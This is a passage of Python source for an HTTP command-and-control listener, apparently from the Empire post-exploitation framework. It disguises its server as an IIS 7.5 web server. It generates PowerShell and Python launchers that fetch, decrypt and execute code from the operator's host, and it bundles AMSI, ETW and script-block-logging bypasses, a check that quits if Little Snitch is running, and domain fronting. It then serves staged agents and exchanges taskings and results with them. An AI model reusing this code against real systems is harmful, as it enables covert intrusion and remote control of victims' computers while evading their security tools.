' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
            # if the current session cookie is empty, generate a new one so that multiple listeners don't end up with empty cookies
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.request.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
stager = helpers.keyword_obfuscation(stager)
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
            # There don't seem to be any conditions under which the encrypt flag isn't set,
            # so the other if/else branches below are effectively dead code.
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
code = helpers.keyword_obfuscation(code)
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
                code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets.decode('latin-1'))
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib.request.urlopen(urllib.request.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
                # The case-insensitive match mirrors the behavior of an actual IIS server.
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
                    # NOTE: this can easily be moved to a parameter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
# Check for hop listener
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
if hopListener is not None:
tempListenerOptions['Host']['Value'] = hopListener.options['Host']['Value']
else:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
